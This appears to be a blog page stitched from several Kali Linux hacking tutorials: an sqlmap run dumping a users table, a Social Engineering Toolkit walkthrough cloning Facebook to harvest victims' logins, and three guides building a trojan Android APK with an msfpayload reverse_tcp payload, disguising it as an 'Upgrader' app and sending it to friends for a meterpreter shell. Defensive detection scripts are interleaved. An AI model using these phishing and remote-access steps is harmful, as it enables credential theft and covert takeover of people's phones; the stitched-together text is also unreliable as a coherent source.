Wednesday, 14 October 2015

Hacking Website with Sqlmap in Kali Linux






In the previous tutorial, we hacked a website using nothing but a simple browser on a
Windows machine. It was a pretty clumsy method, to say the least. However, knowing the
basics is necessary before we move on to the advanced tools. In this tutorial, we'll be using
Kali Linux (see the top navigation bar to find out how to install it if you haven't already) and
SqlMap (which comes preinstalled in Kali) to automate what we did by hand in
the Manual SQL Injection tutorial to hack websites.




It is recommended that you go through the above tutorial once so that you can get an idea
of how to find vulnerable sites. In this tutorial we'll skip the first few steps, in which we find
out whether a website is vulnerable or not, as we already know from the previous tutorial that
this website is vulnerable.

Kali Linux

First off, you need to have Kali Linux (or BackTrack) up and running on your machine.
Any other Linux distro might work, but you'll need to install Sqlmap on your own.
If you don't have Kali Linux installed, you might want to go to this page,
which will get you started: Beginner Hacking Using Kali Linux

Sqlmap


Basically, it's just a tool to make SQL injection easier. Its official website introduces the
tool as: "sqlmap is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database servers. It comes
with a powerful detection engine, many niche features for the ultimate penetration tester and
a broad range of switches lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing commands on the operating
system via out-of-band connections."
A lot of features can be found on the SqlMap website, the most important being:
"Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,
IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems."
That's basically all the database management systems. Most of the time you'll never
come across anything other than MySQL.

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali Linux machine. Start a terminal and type:
sqlmap -h
It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple
command:
sqlmap -u <URL to inject>
In our case, it will be:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes using --time-sec helps to speed up the process, especially when the
server responses are slow.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
Either way, when sqlmap is done, it will tell you the MySQL version and some other
useful information about the database.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap may sometimes ask you questions which have
to be answered with yes/no. Typing y means yes and n means no. Here are a few typical questions
you might come across:
  • A message saying that the database is probably MySQL, so should sqlmap skip all
    other tests and conduct MySQL tests only. Your answer should be yes (y).
  • A message asking whether or not to use the payloads for specific versions of
    MySQL. The answer depends on the situation. If you are unsure, then it's usually better
    to say yes.

Enumeration

Database

In this step, we will obtain the database name, column names and other useful data from the database.
List of a few common enumeration commands
So first we will get the names of the available databases. For this we will add --dbs to our previous
command. The final command will look like:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
So the two databases are acuart and information_schema.

Table

Now we are obviously interested in the acuart database. information_schema can be thought of as
a default table which is present on all your targets, and contains information about the structure of
databases, tables, etc., but not the kind of information we are looking for. It can, however, be
useful on a number of occasions. So, now we will specify the database of interest using -D and
tell sqlmap to list the tables using the --tables option. The final sqlmap command will be:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns
using --columns. I hope you guys are starting to get the pattern by now. The most appealing
table here is users. It might contain the usernames and passwords of registered users on the
website (hackers always look for sensitive data).
The final command should be something like:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
The result would resemble this:

Data

Now, if you were following along attentively, you'll expect that we will now get data from one of the columns.
While that hypothesis is not completely wrong, it's time we go one step further: we will be
getting data from multiple columns. As usual, we will specify the database with -D, the table with -T,
and the columns with -C. We will get all data from the specified columns using --dump. We will enter
multiple columns and separate them with commas. The final command will look like this:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
Here's the result:
John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing
great, but in real-world web pentesting you can come across more sensitive data. Under
such circumstances, the right thing to do is to mail the admin of the website and tell him to fix
the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind
bars. That's it for this tutorial. Try to look at other columns and tables and see what you can
dig up. Take a look at the previous tutorial on Manual SQL Injection, which will help you find
more interesting vulnerable sites.
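A defender's view of the sqlmap run above, as an added example that is not part of the original tutorial: it scans constructed Apache access-log lines for the traces a run against listproducts.php?cat=1 leaves behind (sqlmap's default User-Agent, non-numeric values in a numeric id parameter, and boolean- or time-based payload syntax). The log lines and the detection patterns are my own constructions, not output from the tutorial.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" log lines (not from the tutorial): a normal visit,
# then three probes against the same cat parameter: one carrying sqlmap's default
# User-Agent, one boolean-based (AND 1=1) and one time-based (SLEEP) payload.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Oct/2015:10:01:02 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Oct/2015:10:02:15 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [14/Oct/2015:10:02:16 +0000] "GET /listproducts.php?cat=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Oct/2015:10:02:31 +0000] "GET /listproducts.php?cat=1%20AND%20SLEEP(15) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Boolean/time/union payload shapes plus a stray quote; deliberately simple.
SQLI_RE = re.compile(r"(?i)\b(?:and|or)\b\s+\S+\s*=|\bsleep\s*\(|\bbenchmark\s*\(|\bunion\s+(?:all\s+)?select\b|'")

def analyse_request(path, ua):
    """Return the reasons a request looks like an SQL-injection probe (empty if none)."""
    reasons = []
    if "sqlmap" in ua.lower():
        reasons.append("sqlmap user-agent")
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for value in values:
            # cat is a numeric id in the tutorial's URL, so anything else is suspect
            if name == "cat" and not value.isdigit():
                reasons.append(f"non-numeric {name}={value!r}")
            if SQLI_RE.search(value):
                reasons.append(f"sql syntax in {name}")
    return reasons

def scan_log(text):
    """Return (client ip, request path, reasons) for every line that triggers a reason."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyse_request(m["path"], m["ua"])
        if reasons:
            hits.append((m["ip"], m["path"], reasons))
    return hits
```

On the sample, only the three requests from 10.0.0.9 are reported, each with the reason that matched.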

Hack Facebook with Social Engineering Toolkit – Kali : Credential Harvestor

In this tutorial I'll show you how to simply use the Social Engineering Toolkit on Kali Linux.

Requirements:
1. An active Internet connection.
2. Kali Linux
    (Download Kali Linux)

Steps:
1--> First of all, open a terminal, type se-toolkit and hit enter. If you are not logged in as root, type sudo se-toolkit and hit enter; it will ask you for the administrative password. Enter the password, and it will then ask you to accept the licence agreement: press 'y' (without quotes) and hit enter. You'll be given a list.

2--> From the menu enter 1; it will take you to another menu.


3--> From the above menu select "Website Attack Vectors", i.e. press 2 and hit enter.



4--> From the above menu select "Credential Harvester Attack Method", i.e. press 3 and hit enter.

5--> From the menu below select "Site Cloner", i.e. press 2 and hit enter.


6--> If it asks you for your IP address, open another terminal and type ifconfig (if not logged in as root, type sudo ifconfig), copy your IP address and paste it into the previous terminal where it asked for the IP address.

7--> Now enter the URL to clone, e.g. http://www.facebook.com
Wait a little bit...

{Note: Don't close the terminal running se-toolkit, because you'll receive information there.}
8--> Now shorten that copied IP address using any URL shortener service and send the link to your victim. If s/he enters his/her credentials, you'll get them in the terminal running se-toolkit. When you are done, hit ctrl + c.



{Note:- This Tutorial is for Educational Purpose Only}
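From the defender's side, as an added example that is not part of the original post: a check that flags what a harvester page like the one cloned above looks like once the shortened link is followed. The landing URL and HTML are constructed, and the indicators (bare IP host, plain HTTP, a branded login form whose target is not the brand's own domain) are my own heuristics.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit, urljoin

# Constructed sample: what the shortened link in step 8 might resolve to. A page cloned
# by the credential harvester is served from the attacker's bare IP over plain HTTP,
# while its title and login form still imitate the real site.
SAMPLE_URL = "http://192.168.1.50/"
SAMPLE_HTML = """<html><head><title>Facebook - Log In or Sign Up</title></head>
<body><form action="/" method="post"><input type="email" name="email">
<input type="password" name="pass"><button>Log In</button></form></body></html>"""

class _FormParser(HTMLParser):
    """Collect form actions and note whether a password field is present."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def same_site(host, domain):
    return host == domain or host.endswith("." + domain)

def is_ip_literal(host):
    try:
        return bool(ipaddress.ip_address(host))
    except ValueError:
        return False

def assess_login_page(url, html, brand, brand_domain):
    """Return indicators that a login page branded as `brand` is not hosted on `brand_domain`."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    page = _FormParser()
    page.feed(html)
    findings = []
    if not page.has_password:
        return findings  # no credentials are being asked for, nothing to flag
    if brand.lower() in html.lower() and not same_site(host, brand_domain):
        findings.append(f"{brand} branding served from {host}")
    if is_ip_literal(host):
        findings.append("served from a bare IP address")
    if parts.scheme != "https":
        findings.append("credentials would be sent over plain HTTP")
    for action in page.actions:
        target = (urlsplit(urljoin(url, action)).hostname or "").lower()
        if not same_site(target, brand_domain):
            findings.append(f"login form posts to {target}")
    return findings
```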

Hack Any Android By Creating trojan virus for PHONE.





Hello Hackers! Welcome to my post:
This is a tutorial explaining how to hack Android phones with Kali.
I can't see any tutorials explaining this hack/exploit, so I made one.
(Still, you may already know about this.)

Step 1: Fire-Up Kali:

  • Open a terminal and make a Trojan .apk.
  • You can do this by typing:
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack Android over the WAN, i.e. through the Internet, by using your public/external IP in LHOST and by port forwarding (ask me about port forwarding in the comment section if you have problems).

Step 2: Open Another Terminal:

  • Open another terminal while the file is being produced.
  • Load the Metasploit console by typing: msfconsole

Step 3: Set-Up a Listener:

  • After it loads (it will take time), load the multi-handler exploit by typing: use exploit/multi/handler
  • Set up a (reverse) payload by typing: set payload android/meterpreter/reverse_tcp
  • To set LHOST, type: set LHOST 192.168.0.4 (even if you are attacking over the WAN, type your private/internal IP here, not the public/external one)

Step 4: Exploit!

  • At last, type exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder to your Android phone.
  • Then send it by uploading it to Dropbox or any sharing website (like www.mediafire.com).
  • Then send the link that the website gave you to your friends and exploit their phones (only on the LAN, but if you used the WAN method then you can use the exploit anywhere on the Internet).



  • Let the victim install the Upgrader app (as he would think it is meant to upgrade some features on his phone).
  • However, the option allowing installation of apps from Unknown Sources should be enabled (if it is not already) in the security settings of the Android phone to allow the Trojan to install.
  • And when he clicks Open...

Step 5: BOOM!

There comes the meterpreter prompt:
------------------------------------------HACKED-------------------------------------------------

The END:

Keep coming for more!
Some post modules that work for Windows might not work on Android,
for example: run killavpersistence (persistent backdoor), etc.
Thank you!

A second way for Android, if the first was confusing. Read all of it carefully.


The Main Procedure:

When you are all set, carefully follow the steps below one by one.

Step 1: Open the terminal in Linux, type the code below and press enter.

:~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk




If you don't know your IP address, simply open another terminal and type "ifconfig" without quotes. You can see your IP address beside wlan0; it would be something like 192.168.x.x (Note: you need to do this only when you are connected to the Internet).

Step 2: The payload application evil.apk will now have been generated automatically. You can find it in the home folder.

Step 3: Now open another terminal and type the code below.

> msfconsole



It takes some time for Metasploit to download and load its contents, so be patient!

Step 4: When Metasploit has loaded successfully, type the code below.

> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 192.168.45.4 (the same IP address you entered in step 1)
> set lport 8080 (the same port you used in step 1)
> exploit




Now the console starts listening on 192.168.45.4 at port 8080.

Step 5: Now all you need to do is copy evil.apk from the home folder to the target device.

Step 6: Install evil.apk on the target device and, when the device is connected to the Internet, open the app.

Step 7: As soon as you open the app on the device, you can see the connected device in the console terminal.




Step 8: Now you have full access to the device from the terminal. Just type help and you will be given all the available commands.




Congrats! You have successfully hacked an Android device.




Note: Accessing other's device without their permission is completely illegal. This tutorial is for educational purpose only and never use it for any illegal purpose.


A third way of hacking, with pictures shown below.



Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

Read this article to know more about Metasploit: Introduction to using Metasploit in Kali Linux

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

First up, you need to find your public/external IP and set up port forwarding.

Let's start,

Creating a booby trapped APK file


Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk

(Replace the IP address with your Kali Linux IP address for LHOST and the port with your forwarded port for LPORT.)



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand-alone file with it.

Once this is run, a file called “app.apk” will be created:





2. Now just send this file to your Android device; I used a smartphone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility, I think: basically total access to the phone. This should be a warning to users that this isn't an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:


use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444


Then just type exploit to start the handler:





6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metasploit system you should see this:





An active session is created and it drops you automatically into a meterpreter prompt.

8. From here you can type "sysinfo" to get information on the device:




9. You can see the processes running by typing, “ps”:



You are done!

Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing "help" at a meterpreter prompt will list all the commands that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:


meterpreter > shell
Process 1 created.
Channel 1 created.
ls


The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make paid phone calls, this should be a red flag.
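A review check for the permission prompt the three Android write-ups above describe (the trojan app "lists like every possibility", down to calls that cost money), as an added example that is not part of any of those tutorials: it parses an AndroidManifest.xml excerpt and reports the high-risk permissions that an app calling itself an upgrader cannot justify. The manifest is constructed for illustration, not the actual output of msfpayload, and the risk table and the "expected for an updater" baseline are my own assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID_NAME = "{http://schemas.android.com/apk/res/android}name"

# Constructed manifest excerpt: a self-styled "Upgrader" utility asking for the
# sweeping permission set the posts describe (not real msfpayload output).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.upgrader">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
</manifest>"""

# Permissions that let an app spy, spend the owner's money or exfiltrate data.
HIGH_RISK = {
    "android.permission.RECORD_AUDIO": "record audio",
    "android.permission.CAMERA": "take pictures (cf. webcam_snap)",
    "android.permission.READ_SMS": "read text messages",
    "android.permission.SEND_SMS": "send text messages (may cost money)",
    "android.permission.CALL_PHONE": "place calls (may cost money)",
    "android.permission.READ_CONTACTS": "read contacts",
    "android.permission.READ_CALL_LOG": "read call history",
    "android.permission.ACCESS_FINE_LOCATION": "track precise location",
}

# What a self-described updater utility could plausibly justify (my assumption).
EXPECTED_FOR_UPDATER = {
    "android.permission.INTERNET",
    "android.permission.ACCESS_NETWORK_STATE",
    "android.permission.WRITE_EXTERNAL_STORAGE",
}

def requested_permissions(manifest_xml):
    """All <uses-permission> names declared in the manifest, sorted."""
    root = ET.fromstring(manifest_xml)
    return sorted(el.get(ANDROID_NAME) for el in root.iter("uses-permission"))

def review_permissions(manifest_xml, expected):
    """{permission: what it allows} for high-risk permissions the claimed purpose does not cover."""
    return {p: HIGH_RISK[p] for p in requested_permissions(manifest_xml)
            if p in HIGH_RISK and p not in expected}

def is_overprivileged(manifest_xml, expected, limit=2):
    """True when more than `limit` unjustified high-risk permissions are requested."""
    return len(review_permissions(manifest_xml, expected)) > limit
```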